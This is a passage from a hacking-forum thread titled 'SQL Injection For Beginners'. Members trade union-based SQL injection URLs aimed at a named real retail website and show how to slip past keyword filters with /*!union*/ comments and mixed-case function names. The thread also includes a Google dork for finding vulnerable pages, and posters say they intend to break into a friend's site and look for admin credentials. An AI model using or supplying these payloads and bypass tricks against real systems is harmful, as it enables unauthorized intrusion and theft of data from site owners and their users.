SQL Injection For Beginners

Posts 1630 of 34 · Page 2 of 3
Quote Originally Posted by Blitz View Post
I think it banned me :c
@Blitz

I doubt it, some sites have extra security. There are ways to bypass them that I didn't go over in the tutorial.
Post the link here and I'll give an example, and I plan on updating this sometime soon and adding String Based Injection and WAF bypassing (what you need).
Quote Originally Posted by FUKO View Post


@Blitz

I doubt it, some sites have extra security. There are ways to bypass them that I didn't go over in the tutorial.
Post the link here and I'll give an example, and I plan on updating this sometime soon and adding String Based Injection and WAF bypassing (what you need).
http://www.rainydaymv.com/toys/games...,37,38,39,40--

was what I was working with
Quote Originally Posted by Blitz View Post
Alright, some sites like to block out certain words. Here's a few things they block...

Union
Select
Concat
Group_Concat
Information_schema
Table_schema

To get around it, just comment it like so: /*!TextHere*/

For example

Blocked
Code:
http://www.rainydaymv.com/toys/games-toys-all-ages.php?id=12+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40--
Not blocked
Code:
http://www.rainydaymv.com/toys/games-toys-all-ages.php?id=-12+/*!union*/+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40--
There's still an error, so that site is fucked up, but for future reference, comment some of those words out if you get an error like that. You can also do things like case changing.

A few more examples.

Blocked
Code:
http://site.com/view_product.php?id=null+union+select+1,2,3,4,5,6--
Not blocked
Code:
http://site.com/view_product.php?id=null+/*!union*/+select+1,2,3,4,5,6--
Blocked
Code:
http://site.com/view_product.php?id=null+/*union*/+select+1,2,concat(table_name),4,5,6+from+information_schema.tables--
Not Blocked
Code:
http://site.com/view_product.php?id=null+/*union*/+select+1,2,CoNcAt(table_name),4,5,6+from+information_schema.tables--
If you have any questions, reply or send me a VM/PM.
Nice Job and i will totally try this out
Quote Originally Posted by tHeDoCtOr46 View Post
Havij
Sure, you can use HaviJ, if you're fine knowing you'll never learn anything.

HaviJ = Program that has limits
Doing it manually = No limits, you can use your imagination and do shit a stupid fucking program can't.

I posted this so people can learn something, not for them to use some shitty program.
thx for he the tut gonna fuck my friends website........
Quote Originally Posted by Krooshev View Post
thx for he the tut gonna fuck my friends website........
Only if it's vulnerable to it.
Quote Originally Posted by Fogest View Post


Only if it's vulnerable to it.
i hope so,
Quote Originally Posted by Krooshev View Post
i hope so,
You can do something like:

Code:
inurl:.php?id= site:http://sitename.com
Or run a scan in Acunetix.
Thank you Jamal we need to make this section more active.
Quote Originally Posted by _MASTER View Post
You owe me credits for my dorks you're using there man
I'll give you a hint, starts with a k, ends with a z
Lol, thanks for the dorks. Didn't realize where I got them from. And nice to see you here
I'll have a mod edit them in.
I cant find the admin control panel and i cant find the password
Posts 1630 of 34 · Page 2 of 3
This thread is closed for replies.

Similar Threads

Tags for this Thread

None

Need help?